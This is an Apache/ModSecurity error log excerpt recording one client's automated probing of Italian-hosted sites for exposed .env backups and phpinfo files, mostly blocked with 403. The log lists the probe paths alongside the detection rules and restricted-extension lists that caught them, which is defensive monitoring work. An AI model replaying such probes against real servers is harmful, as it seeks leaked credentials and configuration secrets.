[Sun Nov 16 06:05:51.236311 2025] [:error] [pid 105754] [client 13.62.46.112:48742] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.bak"] [unique_id "aRlbr33mxOhUaPa_1PS3OQAAAAw"]
[Sun Nov 16 06:05:51.236480 2025] [:error] [pid 105754] [client 13.62.46.112:48742] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.bak"] [unique_id "aRlbr33mxOhUaPa_1PS3OQAAAAw"]
[Sun Nov 16 06:05:51.236613 2025] [:error] [pid 105754] [client 13.62.46.112:48742] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env.bak"] [unique_id "aRlbr33mxOhUaPa_1PS3OQAAAAw"]
[Sun Nov 16 06:05:51.260582 2025] [:error] [pid 105733] [client 13.62.46.112:48772] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aRlbrwm3iQ6of_5tM-vZGgAAAAY"]
[Sun Nov 16 06:05:51.260730 2025] [:error] [pid 105733] [client 13.62.46.112:48772] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aRlbrwm3iQ6of_5tM-vZGgAAAAY"]
[Sun Nov 16 06:05:51.260875 2025] [:error] [pid 105733] [client 13.62.46.112:48772] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aRlbrwm3iQ6of_5tM-vZGgAAAAY"]
[Sun Nov 16 06:05:51.322329 2025] [authz_core:error] [pid 105715] [client 13.62.46.112:48838] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.save
[Sun Nov 16 06:05:51.344250 2025] [authz_core:error] [pid 106191] [client 13.62.46.112:48788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Sun Nov 16 06:05:51.388199 2025] [authz_core:error] [pid 105733] [client 13.62.46.112:48860] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.bak
[Sun Nov 16 06:05:51.420742 2025] [:error] [pid 105761] [client 13.62.46.112:48722] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.bak"] [unique_id "aRlbrxajcO0QlxhJbyzqXwAAAAo"]
[Sun Nov 16 06:05:51.420960 2025] [:error] [pid 105761] [client 13.62.46.112:48722] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.bak"] [unique_id "aRlbrxajcO0QlxhJbyzqXwAAAAo"]
[Sun Nov 16 06:05:51.421168 2025] [:error] [pid 105761] [client 13.62.46.112:48722] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.bak"] [unique_id "aRlbrxajcO0QlxhJbyzqXwAAAAo"]
[Sun Nov 16 06:05:51.421351 2025] [:error] [pid 105761] [client 13.62.46.112:48722] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.bak"] [unique_id "aRlbrxajcO0QlxhJbyzqXwAAAAo"]
[Sun Nov 16 06:05:51.566689 2025] [:error] [pid 106193] [client 13.62.46.112:48844] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.old"] [unique_id "aRlbrxmZz13emZeNiG2t_AAAAAg"]
[Sun Nov 16 06:05:51.566847 2025] [:error] [pid 106193] [client 13.62.46.112:48844] [client 13.62.46.112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.old"] [unique_id "aRlbrxmZz13emZeNiG2t_AAAAAg"]
[Sun Nov 16 06:05:51.567021 2025] [:error] [pid 106193] [client 13.62.46.112:48844] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.old"] [unique_id "aRlbrxmZz13emZeNiG2t_AAAAAg"]
[Sun Nov 16 06:05:51.567177 2025] [:error] [pid 106193] [client 13.62.46.112:48844] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env.old"] [unique_id "aRlbrxmZz13emZeNiG2t_AAAAAg"]
[Sun Nov 16 06:05:57.719580 2025] [:error] [pid 105754] [client 13.62.46.112:53182] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/info.php.bak"] [unique_id "aRlbtX3mxOhUaPa_1PS3PAAAAAw"]
[Sun Nov 16 06:05:57.719897 2025] [:error] [pid 105754] [client 13.62.46.112:53182] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/info.php.bak"] [unique_id "aRlbtX3mxOhUaPa_1PS3PAAAAAw"]
[Sun Nov 16 06:05:57.720047 2025] [:error] [pid 105754] [client 13.62.46.112:53182] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/info.php.bak"] [unique_id "aRlbtX3mxOhUaPa_1PS3PAAAAAw"]
[Sun Nov 16 06:05:57.786236 2025] [:error] [pid 105733] [client 13.62.46.112:53186] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.bak"] [unique_id "aRlbtQm3iQ6of_5tM-vZHQAAAAY"]
[Sun Nov 16 06:05:57.786536 2025] [:error] [pid 105733] [client 13.62.46.112:53186] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.bak"] [unique_id "aRlbtQm3iQ6of_5tM-vZHQAAAAY"]
[Sun Nov 16 06:05:57.786677 2025] [:error] [pid 105733] [client 13.62.46.112:53186] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.bak"] [unique_id "aRlbtQm3iQ6of_5tM-vZHQAAAAY"]
[Sun Nov 16 06:06:30.728066 2025] [:error] [pid 106191] [client 13.62.46.112:40076] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.bak"] [unique_id "aRlb1p9TX0jrupNVR0KhRQAAAAI"]
[Sun Nov 16 06:06:30.728435 2025] [:error] [pid 106191] [client 13.62.46.112:40076] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.bak"] [unique_id "aRlb1p9TX0jrupNVR0KhRQAAAAI"]
[Sun Nov 16 06:06:30.728631 2025] [:error] [pid 106191] [client 13.62.46.112:40076] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.bak"] [unique_id "aRlb1p9TX0jrupNVR0KhRQAAAAI"]
[Sun Nov 16 06:06:30.764652 2025] [:error] [pid 105715] [client 13.62.46.112:40086] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/info.php.old"] [unique_id "aRlb1jHqqjYXoy22w5Lv-gAAAAE"]
[Sun Nov 16 06:06:30.765049 2025] [:error] [pid 105715] [client 13.62.46.112:40086] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/info.php.old"] [unique_id "aRlb1jHqqjYXoy22w5Lv-gAAAAE"]
[Sun Nov 16 06:06:30.765212 2025] [:error] [pid 105715] [client 13.62.46.112:40086] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/info.php.old"] [unique_id "aRlb1jHqqjYXoy22w5Lv-gAAAAE"]
[Sun Nov 16 06:06:30.766287 2025] [:error] [pid 106193] [client 13.62.46.112:40096] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/test.php.old"] [unique_id "aRlb1hmZz13emZeNiG2t_gAAAAg"]
[Sun Nov 16 06:06:30.766635 2025] [:error] [pid 106193] [client 13.62.46.112:40096] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test.php.old"] [unique_id "aRlb1hmZz13emZeNiG2t_gAAAAg"]
[Sun Nov 16 06:06:30.766790 2025] [:error] [pid 106193] [client 13.62.46.112:40096] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test.php.old"] [unique_id "aRlb1hmZz13emZeNiG2t_gAAAAg"]
[Sun Nov 16 06:06:30.774259 2025] [:error] [pid 105706] [client 13.62.46.112:40108] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/phpinfo.php.old"] [unique_id "aRlb1vgkUVuXhjEnxphnUwAAAAQ"]
[Sun Nov 16 06:06:30.777979 2025] [:error] [pid 105754] [client 13.62.46.112:40120] [client 13.62.46.112] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.old"] [unique_id "aRlb1n3mxOhUaPa_1PS3PQAAAAw"]
[Sun Nov 16 06:06:30.778221 2025] [:error] [pid 105754] [client 13.62.46.112:40120] [client 13.62.46.112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.old"] [unique_id "aRlb1n3mxOhUaPa_1PS3PQAAAAw"]
[Sun Nov 16 06:06:30.778426 2025] [:error] [pid 105754] [client 13.62.46.112:40120] [client 13.62.46.112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php_info.php.old"] [unique_id "aRlb1n3mxOhUaPa_1PS3PQAAAAw"]
